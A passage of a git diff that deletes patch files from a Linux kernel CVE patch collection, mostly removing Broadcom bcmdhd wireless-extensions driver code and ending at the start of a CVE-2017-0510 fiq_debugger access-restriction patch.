--		uint32 inEvent;			/* input: event type to match */
--		uint32 inStatus;		/* input: event status code to match */
--		uint32 inReason;		/* input: event reason code to match */
--		const char* outName;	/* output: failure type */
--		const char* outCause;	/* output: failure cause */
--	} conn_fail_event_map_t;
--
--	/* Map of WLC_E events to connection failure strings */
--#	define WL_IW_DONT_CARE	9999
--	const conn_fail_event_map_t event_map [] = {
--		/* inEvent           inStatus                inReason         */
--		/* outName outCause                                           */
--		{WLC_E_SET_SSID,     WLC_E_STATUS_SUCCESS,   WL_IW_DONT_CARE,
--		"Conn", "Success"},
--		{WLC_E_SET_SSID,     WLC_E_STATUS_NO_NETWORKS, WL_IW_DONT_CARE,
--		"Conn", "NoNetworks"},
--		{WLC_E_SET_SSID,     WLC_E_STATUS_FAIL,      WL_IW_DONT_CARE,
--		"Conn", "ConfigMismatch"},
--		{WLC_E_PRUNE,        WL_IW_DONT_CARE,        WLC_E_PRUNE_ENCR_MISMATCH,
--		"Conn", "EncrypMismatch"},
--		{WLC_E_PRUNE,        WL_IW_DONT_CARE,        WLC_E_RSN_MISMATCH,
--		"Conn", "RsnMismatch"},
--		{WLC_E_AUTH,         WLC_E_STATUS_TIMEOUT,   WL_IW_DONT_CARE,
--		"Conn", "AuthTimeout"},
--		{WLC_E_AUTH,         WLC_E_STATUS_FAIL,      WL_IW_DONT_CARE,
--		"Conn", "AuthFail"},
--		{WLC_E_AUTH,         WLC_E_STATUS_NO_ACK,    WL_IW_DONT_CARE,
--		"Conn", "AuthNoAck"},
--		{WLC_E_REASSOC,      WLC_E_STATUS_FAIL,      WL_IW_DONT_CARE,
--		"Conn", "ReassocFail"},
--		{WLC_E_REASSOC,      WLC_E_STATUS_TIMEOUT,   WL_IW_DONT_CARE,
--		"Conn", "ReassocTimeout"},
--		{WLC_E_REASSOC,      WLC_E_STATUS_ABORT,     WL_IW_DONT_CARE,
--		"Conn", "ReassocAbort"},
--		{WLC_E_PSK_SUP,      WLC_SUP_KEYED,          WL_IW_DONT_CARE,
--		"Sup", "ConnSuccess"},
--		{WLC_E_PSK_SUP,      WL_IW_DONT_CARE,        WL_IW_DONT_CARE,
--		"Sup", "WpaHandshakeFail"},
--		{WLC_E_DEAUTH_IND,   WL_IW_DONT_CARE,        WL_IW_DONT_CARE,
--		"Conn", "Deauth"},
--		{WLC_E_DISASSOC_IND, WL_IW_DONT_CARE,        WL_IW_DONT_CARE,
--		"Conn", "DisassocInd"},
--		{WLC_E_DISASSOC,     WL_IW_DONT_CARE,        WL_IW_DONT_CARE,
--		"Conn", "Disassoc"}
--	};
--
--	const char* name = "";
--	const char* cause = NULL;
--	int i;
--
--	/* Search the event map table for a matching event */
--	for (i = 0;  i < sizeof(event_map)/sizeof(event_map[0]);  i++) {
--		const conn_fail_event_map_t* row = &event_map[i];
--		if (row->inEvent == event_type &&
--		    (row->inStatus == status || row->inStatus == WL_IW_DONT_CARE) &&
--		    (row->inReason == reason || row->inReason == WL_IW_DONT_CARE)) {
--			name = row->outName;
--			cause = row->outCause;
--			break;
--		}
--	}
--
--	/* If found, generate a connection failure string and return TRUE */
--	if (cause) {
--		memset(stringBuf, 0, buflen);
--		snprintf(stringBuf, buflen, "%s %s %02d %02d",
--			name, cause, status, reason);
--		WL_TRACE(("Connection status: %s\n", stringBuf));
--		return TRUE;
--	} else {
--		return FALSE;
--	}
--}
--
--#if (WIRELESS_EXT > 14)
--/* Check if we have received an event that indicates connection failure
-- * If so, generate a connection failure report string.
-- * The caller supplies a buffer to hold the generated string.
-- */
--static bool
--wl_iw_check_conn_fail(wl_event_msg_t *e, char* stringBuf, uint buflen)
--{
--	uint32 event = ntoh32(e->event_type);
--	uint32 status =  ntoh32(e->status);
--	uint32 reason =  ntoh32(e->reason);
--
--	if (wl_iw_conn_status_str(event, status, reason, stringBuf, buflen)) {
--		return TRUE;
--	} else
--	{
--		return FALSE;
--	}
--}
--#endif /* WIRELESS_EXT > 14 */
--
--#ifndef IW_CUSTOM_MAX
--#define IW_CUSTOM_MAX 256 /* size of extra buffer used for translation of events */
--#endif /* IW_CUSTOM_MAX */
--
--void
--wl_iw_event(struct net_device *dev, wl_event_msg_t *e, void* data)
--{
--#if WIRELESS_EXT > 13
--	union iwreq_data wrqu;
--	char extra[IW_CUSTOM_MAX + 1];
--	int cmd = 0;
--	uint32 event_type = ntoh32(e->event_type);
--	uint16 flags =  ntoh16(e->flags);
--	uint32 datalen = ntoh32(e->datalen);
--	uint32 status =  ntoh32(e->status);
--
--	memset(&wrqu, 0, sizeof(wrqu));
--	memset(extra, 0, sizeof(extra));
--
--	memcpy(wrqu.addr.sa_data, &e->addr, ETHER_ADDR_LEN);
--	wrqu.addr.sa_family = ARPHRD_ETHER;
--
--	switch (event_type) {
--	case WLC_E_TXFAIL:
--		cmd = IWEVTXDROP;
--		break;
--#if WIRELESS_EXT > 14
--	case WLC_E_JOIN:
--	case WLC_E_ASSOC_IND:
--	case WLC_E_REASSOC_IND:
--		cmd = IWEVREGISTERED;
--		break;
--	case WLC_E_DEAUTH_IND:
--	case WLC_E_DISASSOC_IND:
--		cmd = SIOCGIWAP;
--		wrqu.data.length = strlen(extra);
--		bzero(wrqu.addr.sa_data, ETHER_ADDR_LEN);
--		bzero(&extra, ETHER_ADDR_LEN);
--		break;
--
--	case WLC_E_LINK:
--	case WLC_E_NDIS_LINK:
--		cmd = SIOCGIWAP;
--		wrqu.data.length = strlen(extra);
--		if (!(flags & WLC_EVENT_MSG_LINK)) {
--			bzero(wrqu.addr.sa_data, ETHER_ADDR_LEN);
--			bzero(&extra, ETHER_ADDR_LEN);
--		}
--		break;
--	case WLC_E_ACTION_FRAME:
--		cmd = IWEVCUSTOM;
--		if (datalen + 1 <= sizeof(extra)) {
--			wrqu.data.length = datalen + 1;
--			extra[0] = WLC_E_ACTION_FRAME;
--			memcpy(&extra[1], data, datalen);
--			WL_TRACE(("WLC_E_ACTION_FRAME len %d \n", wrqu.data.length));
--		}
--		break;
--
--	case WLC_E_ACTION_FRAME_COMPLETE:
--		cmd = IWEVCUSTOM;
--		if (sizeof(status) + 1 <= sizeof(extra)) {
--			wrqu.data.length = sizeof(status) + 1;
--			extra[0] = WLC_E_ACTION_FRAME_COMPLETE;
--			memcpy(&extra[1], &status, sizeof(status));
--			WL_TRACE(("wl_iw_event status %d  \n", status));
--		}
--		break;
--#endif /* WIRELESS_EXT > 14 */
--#if WIRELESS_EXT > 17
--	case WLC_E_MIC_ERROR: {
--		struct	iw_michaelmicfailure  *micerrevt = (struct  iw_michaelmicfailure  *)&extra;
--		cmd = IWEVMICHAELMICFAILURE;
--		wrqu.data.length = sizeof(struct iw_michaelmicfailure);
--		if (flags & WLC_EVENT_MSG_GROUP)
--			micerrevt->flags |= IW_MICFAILURE_GROUP;
--		else
--			micerrevt->flags |= IW_MICFAILURE_PAIRWISE;
--		memcpy(micerrevt->src_addr.sa_data, &e->addr, ETHER_ADDR_LEN);
--		micerrevt->src_addr.sa_family = ARPHRD_ETHER;
--
--		break;
--	}
--
--	case WLC_E_ASSOC_REQ_IE:
--		cmd = IWEVASSOCREQIE;
--		wrqu.data.length = datalen;
--		if (datalen < sizeof(extra))
--			memcpy(extra, data, datalen);
--		break;
--
--	case WLC_E_ASSOC_RESP_IE:
--		cmd = IWEVASSOCRESPIE;
--		wrqu.data.length = datalen;
--		if (datalen < sizeof(extra))
--			memcpy(extra, data, datalen);
--		break;
--
--	case WLC_E_PMKID_CACHE: {
--		struct iw_pmkid_cand *iwpmkidcand = (struct iw_pmkid_cand *)&extra;
--		pmkid_cand_list_t *pmkcandlist;
--		pmkid_cand_t	*pmkidcand;
--		int count;
--
--		if (data == NULL)
--			break;
--
--		cmd = IWEVPMKIDCAND;
--		pmkcandlist = data;
--		count = ntoh32_ua((uint8 *)&pmkcandlist->npmkid_cand);
--		wrqu.data.length = sizeof(struct iw_pmkid_cand);
--		pmkidcand = pmkcandlist->pmkid_cand;
--		while (count) {
--			bzero(iwpmkidcand, sizeof(struct iw_pmkid_cand));
--			if (pmkidcand->preauth)
--				iwpmkidcand->flags |= IW_PMKID_CAND_PREAUTH;
--			bcopy(&pmkidcand->BSSID, &iwpmkidcand->bssid.sa_data,
--			      ETHER_ADDR_LEN);
--			wireless_send_event(dev, cmd, &wrqu, extra);
--			pmkidcand++;
--			count--;
--		}
--		break;
--	}
--#endif /* WIRELESS_EXT > 17 */
--
--	case WLC_E_SCAN_COMPLETE:
--#if WIRELESS_EXT > 14
--		cmd = SIOCGIWSCAN;
--#endif
--		WL_TRACE(("event WLC_E_SCAN_COMPLETE\n"));
--		if ((g_iscan) && (g_iscan->sysioc_pid >= 0) &&
--			(g_iscan->iscan_state != ISCAN_STATE_IDLE))
--			up(&g_iscan->sysioc_sem);
--		break;
--
--	default:
--		/* Cannot translate event */
--		break;
--	}
--
--	if (cmd) {
--		if (cmd == SIOCGIWSCAN)
--			wireless_send_event(dev, cmd, &wrqu, NULL);
--		else
--			wireless_send_event(dev, cmd, &wrqu, extra);
--	}
--
--#if WIRELESS_EXT > 14
--	/* Look for WLC events that indicate a connection failure.
--	 * If found, generate an IWEVCUSTOM event.
--	 */
--	memset(extra, 0, sizeof(extra));
--	if (wl_iw_check_conn_fail(e, extra, sizeof(extra))) {
--		cmd = IWEVCUSTOM;
--		wrqu.data.length = strlen(extra);
--		wireless_send_event(dev, cmd, &wrqu, extra);
--	}
--#endif /* WIRELESS_EXT > 14 */
--
--#endif /* WIRELESS_EXT > 13 */
--}
--
--int wl_iw_get_wireless_stats(struct net_device *dev, struct iw_statistics *wstats)
--{
--	int res = 0;
--	wl_cnt_t cnt;
--	int phy_noise;
--	int rssi;
--	scb_val_t scb_val;
--
--	phy_noise = 0;
--	if ((res = dev_wlc_ioctl(dev, WLC_GET_PHY_NOISE, &phy_noise, sizeof(phy_noise))))
--		goto done;
--
--	phy_noise = dtoh32(phy_noise);
--	WL_TRACE(("wl_iw_get_wireless_stats phy noise=%d\n *****", phy_noise));
--
--	scb_val.val = 0;
--	if ((res = dev_wlc_ioctl(dev, WLC_GET_RSSI, &scb_val, sizeof(scb_val_t))))
--		goto done;
--
--	rssi = dtoh32(scb_val.val);
--	WL_TRACE(("wl_iw_get_wireless_stats rssi=%d ****** \n", rssi));
--	if (rssi <= WL_IW_RSSI_NO_SIGNAL)
--		wstats->qual.qual = 0;
--	else if (rssi <= WL_IW_RSSI_VERY_LOW)
--		wstats->qual.qual = 1;
--	else if (rssi <= WL_IW_RSSI_LOW)
--		wstats->qual.qual = 2;
--	else if (rssi <= WL_IW_RSSI_GOOD)
--		wstats->qual.qual = 3;
--	else if (rssi <= WL_IW_RSSI_VERY_GOOD)
--		wstats->qual.qual = 4;
--	else
--		wstats->qual.qual = 5;
--
--	/* Wraps to 0 if RSSI is 0 */
--	wstats->qual.level = 0x100 + rssi;
--	wstats->qual.noise = 0x100 + phy_noise;
--#if WIRELESS_EXT > 18
--	wstats->qual.updated |= (IW_QUAL_ALL_UPDATED | IW_QUAL_DBM);
--#else
--	wstats->qual.updated |= 7;
--#endif /* WIRELESS_EXT > 18 */
--
--#if WIRELESS_EXT > 11
--	WL_TRACE(("wl_iw_get_wireless_stats counters=%d\n *****", (int)sizeof(wl_cnt_t)));
--
--	memset(&cnt, 0, sizeof(wl_cnt_t));
--	res = dev_wlc_bufvar_get(dev, "counters", (char *)&cnt, sizeof(wl_cnt_t));
--	if (res)
--	{
--		WL_ERROR(("wl_iw_get_wireless_stats counters failed error=%d ****** \n", res));
--		goto done;
--	}
--
--	cnt.version = dtoh16(cnt.version);
--	if (cnt.version != WL_CNT_T_VERSION) {
--		WL_TRACE(("\tIncorrect version of counters struct: expected %d; got %d\n",
--			WL_CNT_T_VERSION, cnt.version));
--		goto done;
--	}
--
--	wstats->discard.nwid = 0;
--	wstats->discard.code = dtoh32(cnt.rxundec);
--	wstats->discard.fragment = dtoh32(cnt.rxfragerr);
--	wstats->discard.retries = dtoh32(cnt.txfail);
--	wstats->discard.misc = dtoh32(cnt.rxrunt) + dtoh32(cnt.rxgiant);
--	wstats->miss.beacon = 0;
--
--	WL_TRACE(("wl_iw_get_wireless_stats counters txframe=%d txbyte=%d\n",
--		dtoh32(cnt.txframe), dtoh32(cnt.txbyte)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxfrmtoolong=%d\n", dtoh32(cnt.rxfrmtoolong)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxbadplcp=%d\n", dtoh32(cnt.rxbadplcp)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxundec=%d\n", dtoh32(cnt.rxundec)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxfragerr=%d\n", dtoh32(cnt.rxfragerr)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters txfail=%d\n", dtoh32(cnt.txfail)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxrunt=%d\n", dtoh32(cnt.rxrunt)));
--	WL_TRACE(("wl_iw_get_wireless_stats counters rxgiant=%d\n", dtoh32(cnt.rxgiant)));
--
--#endif /* WIRELESS_EXT > 11 */
--
--done:
--	return res;
--}
--
--static void
--wl_iw_timerfunc(ulong data)
--{
--	iscan_info_t *iscan = (iscan_info_t *)data;
--	iscan->timer_on = 0;
--	if (iscan->iscan_state != ISCAN_STATE_IDLE) {
--		WL_TRACE(("timer trigger\n"));
--		up(&iscan->sysioc_sem);
--	}
--}
--
--static void
--wl_iw_set_event_mask(struct net_device *dev)
--{
--	char eventmask[WL_EVENTING_MASK_LEN];
--	char iovbuf[WL_EVENTING_MASK_LEN + 12];	/* Room for "event_msgs" + '\0' + bitvec */
--
--	dev_iw_iovar_getbuf(dev, "event_msgs", "", 0, iovbuf, sizeof(iovbuf));
--	bcopy(iovbuf, eventmask, WL_EVENTING_MASK_LEN);
--	setbit(eventmask, WLC_E_SCAN_COMPLETE);
--	dev_iw_iovar_setbuf(dev, "event_msgs", eventmask, WL_EVENTING_MASK_LEN,
--		iovbuf, sizeof(iovbuf));
--
--}
--
--static int
--wl_iw_iscan_prep(wl_scan_params_t *params, wlc_ssid_t *ssid)
--{
--	int err = 0;
--
--	memcpy(&params->bssid, &ether_bcast, ETHER_ADDR_LEN);
--	params->bss_type = DOT11_BSSTYPE_ANY;
--	params->scan_type = 0;
--	params->nprobes = -1;
--	params->active_time = -1;
--	params->passive_time = -1;
--	params->home_time = -1;
--	params->channel_num = 0;
--
--	params->nprobes = htod32(params->nprobes);
--	params->active_time = htod32(params->active_time);
--	params->passive_time = htod32(params->passive_time);
--	params->home_time = htod32(params->home_time);
--	if (ssid && ssid->SSID_len)
--		memcpy(&params->ssid, ssid, sizeof(wlc_ssid_t));
--
--	return err;
--}
--
--static int
--wl_iw_iscan(iscan_info_t *iscan, wlc_ssid_t *ssid, uint16 action)
--{
--	int params_size = (WL_SCAN_PARAMS_FIXED_SIZE + OFFSETOF(wl_iscan_params_t, params));
--	wl_iscan_params_t *params;
--	int err = 0;
--
--	if (ssid && ssid->SSID_len) {
--		params_size += sizeof(wlc_ssid_t);
--	}
--	params = (wl_iscan_params_t*)kmalloc(params_size, GFP_KERNEL);
--	if (params == NULL) {
--		return -ENOMEM;
--	}
--	memset(params, 0, params_size);
--	DHD_WARN(params_size < WLC_IOCTL_SMLEN, kfree(params);return BCME_ERROR;);
--
--	err = wl_iw_iscan_prep(&params->params, ssid);
--
--	if (!err) {
--		params->version = htod32(ISCAN_REQ_VERSION);
--		params->action = htod16(action);
--		params->scan_duration = htod16(0);
--
--		/* params_size += OFFSETOF(wl_iscan_params_t, params); */
--		(void) dev_iw_iovar_setbuf(iscan->dev, "iscan", params, params_size,
--			iscan->ioctlbuf, WLC_IOCTL_SMLEN);
--	}
--
--	kfree(params);
--	return err;
--}
--
--static uint32
--wl_iw_iscan_get(iscan_info_t *iscan)
--{
--	iscan_buf_t * buf;
--	iscan_buf_t * ptr;
--	wl_iscan_results_t * list_buf;
--	wl_iscan_results_t list;
--	wl_scan_results_t *results;
--	uint32 status;
--
--	/* buffers are allocated on demand */
--	if (iscan->list_cur) {
--		buf = iscan->list_cur;
--		iscan->list_cur = buf->next;
--	}
--	else {
--		buf = kmalloc(sizeof(iscan_buf_t), GFP_KERNEL);
--		if (!buf)
--			return WL_SCAN_RESULTS_ABORTED;
--		buf->next = NULL;
--		if (!iscan->list_hdr)
--			iscan->list_hdr = buf;
--		else {
--			ptr = iscan->list_hdr;
--			while (ptr->next) {
--				ptr = ptr->next;
--			}
--			ptr->next = buf;
--		}
--	}
--	memset(buf->iscan_buf, 0, WLC_IW_ISCAN_MAXLEN);
--	list_buf = (wl_iscan_results_t*)buf->iscan_buf;
--	results = &list_buf->results;
--	results->buflen = WL_ISCAN_RESULTS_FIXED_SIZE;
--	results->version = 0;
--	results->count = 0;
--
--	memset(&list, 0, sizeof(list));
--	list.results.buflen = htod32(WLC_IW_ISCAN_MAXLEN);
--	(void) dev_iw_iovar_getbuf(
--		iscan->dev,
--		"iscanresults",
--		&list,
--		WL_ISCAN_RESULTS_FIXED_SIZE,
--		buf->iscan_buf,
--		WLC_IW_ISCAN_MAXLEN);
--	results->buflen = dtoh32(results->buflen);
--	results->version = dtoh32(results->version);
--	results->count = dtoh32(results->count);
--	WL_TRACE(("results->count = %d\n", results->count));
--
--	WL_TRACE(("results->buflen = %d\n", results->buflen));
--	status = dtoh32(list_buf->status);
--	return status;
--}
--
--static void wl_iw_send_scan_complete(iscan_info_t *iscan)
--{
--	union iwreq_data wrqu;
--
--	memset(&wrqu, 0, sizeof(wrqu));
--
--	/* wext expects to get no data for SIOCGIWSCAN Event  */
--	wireless_send_event(iscan->dev, SIOCGIWSCAN, &wrqu, NULL);
--}
--
--static int
--_iscan_sysioc_thread(void *data)
--{
--	uint32 status;
--	iscan_info_t *iscan = (iscan_info_t *)data;
--
--	DAEMONIZE("iscan_sysioc");
--
--	status = WL_SCAN_RESULTS_PARTIAL;
--	while (down_interruptible(&iscan->sysioc_sem) == 0) {
--		if (iscan->timer_on) {
--			del_timer(&iscan->timer);
--			iscan->timer_on = 0;
--		}
--
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
--		rtnl_lock();
--#endif
--		status = wl_iw_iscan_get(iscan);
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
--		rtnl_unlock();
--#endif
--
--		switch (status) {
--			case WL_SCAN_RESULTS_PARTIAL:
--				WL_TRACE(("iscanresults incomplete\n"));
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
--				rtnl_lock();
--#endif
--				/* make sure our buffer size is enough before going next round */
--				wl_iw_iscan(iscan, NULL, WL_SCAN_ACTION_CONTINUE);
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27))
--				rtnl_unlock();
--#endif
--				/* Reschedule the timer */
--				iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms);
--				add_timer(&iscan->timer);
--				iscan->timer_on = 1;
--				break;
--			case WL_SCAN_RESULTS_SUCCESS:
--				WL_TRACE(("iscanresults complete\n"));
--				iscan->iscan_state = ISCAN_STATE_IDLE;
--				wl_iw_send_scan_complete(iscan);
--				break;
--			case WL_SCAN_RESULTS_PENDING:
--				WL_TRACE(("iscanresults pending\n"));
--				/* Reschedule the timer */
--				iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms);
--				add_timer(&iscan->timer);
--				iscan->timer_on = 1;
--				break;
--			case WL_SCAN_RESULTS_ABORTED:
--				WL_TRACE(("iscanresults aborted\n"));
--				iscan->iscan_state = ISCAN_STATE_IDLE;
--				wl_iw_send_scan_complete(iscan);
--				break;
--			default:
--				WL_TRACE(("iscanresults returned unknown status %d\n", status));
--				break;
--		 }
--	}
--	complete_and_exit(&iscan->sysioc_exited, 0);
--}
--
--int
--wl_iw_attach(struct net_device *dev, void * dhdp)
--{
--	iscan_info_t *iscan = NULL;
--
--	if (!dev)
--		return 0;
--
--	iscan = kmalloc(sizeof(iscan_info_t), GFP_KERNEL);
--	if (!iscan)
--		return -ENOMEM;
--	memset(iscan, 0, sizeof(iscan_info_t));
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0))
--	iscan->kthread = NULL;
--#endif
--	iscan->sysioc_pid = -1;
--	/* we only care about main interface so save a global here */
--	g_iscan = iscan;
--	iscan->dev = dev;
--	iscan->iscan_state = ISCAN_STATE_IDLE;
--
--
--	/* Set up the timer */
--	iscan->timer_ms    = 2000;
--	init_timer(&iscan->timer);
--	iscan->timer.data = (ulong)iscan;
--	iscan->timer.function = wl_iw_timerfunc;
--
--	sema_init(&iscan->sysioc_sem, 0);
--	init_completion(&iscan->sysioc_exited);
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0))
--	iscan->kthread = kthread_run(_iscan_sysioc_thread, iscan, "iscan_sysioc");
--	iscan->sysioc_pid = iscan->kthread->pid;
--#else
--	iscan->sysioc_pid = kernel_thread(_iscan_sysioc_thread, iscan, 0);
--#endif
--	if (iscan->sysioc_pid < 0)
--		return -ENOMEM;
--	return 0;
--}
--
--void wl_iw_detach(void)
--{
--	iscan_buf_t  *buf;
--	iscan_info_t *iscan = g_iscan;
--	if (!iscan)
--		return;
--	if (iscan->sysioc_pid >= 0) {
--		KILL_PROC(iscan->sysioc_pid, SIGTERM);
--		wait_for_completion(&iscan->sysioc_exited);
--	}
--
--	while (iscan->list_hdr) {
--		buf = iscan->list_hdr->next;
--		kfree(iscan->list_hdr);
--		iscan->list_hdr = buf;
--	}
--	kfree(iscan);
--	g_iscan = NULL;
--}
--
--#endif /* USE_IW */
-diff --git a/drivers/net/wireless/bcmdhd/wl_iw.h b/drivers/net/wireless/bcmdhd/wl_iw.h
-deleted file mode 100644
-index 95b2abdbd7c58..0000000000000
---- a/drivers/net/wireless/bcmdhd/wl_iw.h
-+++ /dev/null
-@@ -1,161 +0,0 @@
--/*
-- * Linux Wireless Extensions support
-- *
-- * Copyright (C) 1999-2014, Broadcom Corporation
-- * 
-- *      Unless you and Broadcom execute a separate written software license
-- * agreement governing use of this software, this software is licensed to you
-- * under the terms of the GNU General Public License version 2 (the "GPL"),
-- * available at http://www.broadcom.com/licenses/GPLv2.php, with the
-- * following added to such license:
-- * 
-- *      As a special exception, the copyright holders of this software give you
-- * permission to link this software with independent modules, and to copy and
-- * distribute the resulting executable under terms of your choice, provided that
-- * you also meet, for each linked independent module, the terms and conditions of
-- * the license of that module.  An independent module is a module which is not
-- * derived from this software.  The special exception does not apply to any
-- * modifications of the software.
-- * 
-- *      Notwithstanding the above, under no circumstances may you combine this
-- * software in any way with any other Broadcom software provided under a license
-- * other than the GPL, without Broadcom's express prior written consent.
-- *
-- * $Id: wl_iw.h 467328 2014-04-03 01:23:40Z $
-- */
--
--#ifndef _wl_iw_h_
--#define _wl_iw_h_
--
--#include <linux/wireless.h>
--
--#include <typedefs.h>
--#include <proto/ethernet.h>
--#include <wlioctl.h>
--
--#define WL_SCAN_PARAMS_SSID_MAX 	10
--#define GET_SSID			"SSID="
--#define GET_CHANNEL			"CH="
--#define GET_NPROBE 			"NPROBE="
--#define GET_ACTIVE_ASSOC_DWELL  	"ACTIVE="
--#define GET_PASSIVE_ASSOC_DWELL  	"PASSIVE="
--#define GET_HOME_DWELL  		"HOME="
--#define GET_SCAN_TYPE			"TYPE="
--
--#define BAND_GET_CMD				"GETBAND"
--#define BAND_SET_CMD				"SETBAND"
--#define DTIM_SKIP_GET_CMD			"DTIMSKIPGET"
--#define DTIM_SKIP_SET_CMD			"DTIMSKIPSET"
--#define SETSUSPEND_CMD				"SETSUSPENDOPT"
--#define PNOSSIDCLR_SET_CMD			"PNOSSIDCLR"
--/* Lin - Is the extra space needed? */
--#define PNOSETUP_SET_CMD			"PNOSETUP " /* TLV command has extra end space */
--#define PNOENABLE_SET_CMD			"PNOFORCE"
--#define PNODEBUG_SET_CMD			"PNODEBUG"
--#define TXPOWER_SET_CMD			"TXPOWER"
--
--#define MAC2STR(a) (a)[0], (a)[1], (a)[2], (a)[3], (a)[4], (a)[5]
--#define MACSTR "%02x:%02x:%02x:%02x:%02x:%02x"
--
--/* Structure to keep global parameters */
--typedef struct wl_iw_extra_params {
--	int 	target_channel; /* target channel */
--} wl_iw_extra_params_t;
--
--struct cntry_locales_custom {
--	char iso_abbrev[WLC_CNTRY_BUF_SZ];	/* ISO 3166-1 country abbreviation */
--	char custom_locale[WLC_CNTRY_BUF_SZ];	/* Custom firmware locale */
--	int32 custom_locale_rev;		/* Custom local revisin default -1 */
--};
--/* ============================================== */
--/* Defines from wlc_pub.h */
--#define	WL_IW_RSSI_MINVAL		-200	/* Low value, e.g. for forcing roam */
--#define	WL_IW_RSSI_NO_SIGNAL	-91	/* NDIS RSSI link quality cutoffs */
--#define	WL_IW_RSSI_VERY_LOW	-80	/* Very low quality cutoffs */
--#define	WL_IW_RSSI_LOW		-70	/* Low quality cutoffs */
--#define	WL_IW_RSSI_GOOD		-68	/* Good quality cutoffs */
--#define	WL_IW_RSSI_VERY_GOOD	-58	/* Very good quality cutoffs */
--#define	WL_IW_RSSI_EXCELLENT	-57	/* Excellent quality cutoffs */
--#define	WL_IW_RSSI_INVALID	 0	/* invalid RSSI value */
--#define MAX_WX_STRING 80
--#define SSID_FMT_BUF_LEN	((4 * 32) + 1)
--#define isprint(c) bcm_isprint(c)
--#define WL_IW_SET_ACTIVE_SCAN	(SIOCIWFIRSTPRIV+1)
--#define WL_IW_GET_RSSI			(SIOCIWFIRSTPRIV+3)
--#define WL_IW_SET_PASSIVE_SCAN	(SIOCIWFIRSTPRIV+5)
--#define WL_IW_GET_LINK_SPEED	(SIOCIWFIRSTPRIV+7)
--#define WL_IW_GET_CURR_MACADDR	(SIOCIWFIRSTPRIV+9)
--#define WL_IW_SET_STOP				(SIOCIWFIRSTPRIV+11)
--#define WL_IW_SET_START			(SIOCIWFIRSTPRIV+13)
--
--#define 		G_SCAN_RESULTS 8*1024
--#define 		WE_ADD_EVENT_FIX	0x80
--#define          G_WLAN_SET_ON	0
--#define          G_WLAN_SET_OFF	1
--
--
--typedef struct wl_iw {
--	char nickname[IW_ESSID_MAX_SIZE];
--
--	struct iw_statistics wstats;
--
--	int spy_num;
--	uint32 pwsec;			/* pairwise wsec setting */
--	uint32 gwsec;			/* group wsec setting  */
--	bool privacy_invoked; 		/* IW_AUTH_PRIVACY_INVOKED setting */
--	struct ether_addr spy_addr[IW_MAX_SPY];
--	struct iw_quality spy_qual[IW_MAX_SPY];
--	void  *wlinfo;
--} wl_iw_t;
--
--struct wl_ctrl {
--	struct timer_list *timer;
--	struct net_device *dev;
--	long sysioc_pid;
--	struct semaphore sysioc_sem;
--	struct completion sysioc_exited;
--};
--
--
--#if WIRELESS_EXT > 12
--#include <net/iw_handler.h>
--extern const struct iw_handler_def wl_iw_handler_def;
--#endif /* WIRELESS_EXT > 12 */
--
--extern int wl_iw_ioctl(struct net_device *dev, struct ifreq *rq, int cmd);
--extern void wl_iw_event(struct net_device *dev, wl_event_msg_t *e, void* data);
--extern int wl_iw_get_wireless_stats(struct net_device *dev, struct iw_statistics *wstats);
--int wl_iw_attach(struct net_device *dev, void * dhdp);
--int wl_iw_send_priv_event(struct net_device *dev, char *flag);
--
--void wl_iw_detach(void);
--
--#define CSCAN_COMMAND				"CSCAN "
--#define CSCAN_TLV_PREFIX 			'S'
--#define CSCAN_TLV_VERSION			1
--#define CSCAN_TLV_SUBVERSION			0
--#define CSCAN_TLV_TYPE_SSID_IE          'S'
--#define CSCAN_TLV_TYPE_CHANNEL_IE   'C'
--#define CSCAN_TLV_TYPE_NPROBE_IE     'N'
--#define CSCAN_TLV_TYPE_ACTIVE_IE      'A'
--#define CSCAN_TLV_TYPE_PASSIVE_IE    'P'
--#define CSCAN_TLV_TYPE_HOME_IE         'H'
--#define CSCAN_TLV_TYPE_STYPE_IE        'T'
--
--#if LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)
--#define IWE_STREAM_ADD_EVENT(info, stream, ends, iwe, extra) \
--	iwe_stream_add_event(info, stream, ends, iwe, extra)
--#define IWE_STREAM_ADD_VALUE(info, event, value, ends, iwe, event_len) \
--	iwe_stream_add_value(info, event, value, ends, iwe, event_len)
--#define IWE_STREAM_ADD_POINT(info, stream, ends, iwe, extra) \
--	iwe_stream_add_point(info, stream, ends, iwe, extra)
--#else
--#define IWE_STREAM_ADD_EVENT(info, stream, ends, iwe, extra) \
--	iwe_stream_add_event(stream, ends, iwe, extra)
--#define IWE_STREAM_ADD_VALUE(info, event, value, ends, iwe, event_len) \
--	iwe_stream_add_value(event, value, ends, iwe, event_len)
--#define IWE_STREAM_ADD_POINT(info, stream, ends, iwe, extra) \
--	iwe_stream_add_point(stream, ends, iwe, extra)
--#endif
--
--#endif /* _wl_iw_h_ */
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch
deleted file mode 100644
index 9ae4f425..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From d4dfd82835bb6f92de3bfb8a1cbf6beaf892ad08 Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn <salyzyn@google.com>
-Date: Tue, 20 Dec 2016 15:59:19 -0800
-Subject: android: fiq_debugger: restrict access to critical commands.
-
-Sysrq must be enabled via /proc/sys/kernel/sysrq as a security
-measure to enable various critical fiq debugger commands that
-either leak information or can be used as a system attack.
-
-Default disabled, this will leave the reboot, reset, irqs, sleep,
-nosleep, console and ps commands.  Reboot and reset commands
-will be restricted from taking any parameters.  We will also
-switch to showing the limited command set in this mode.
-
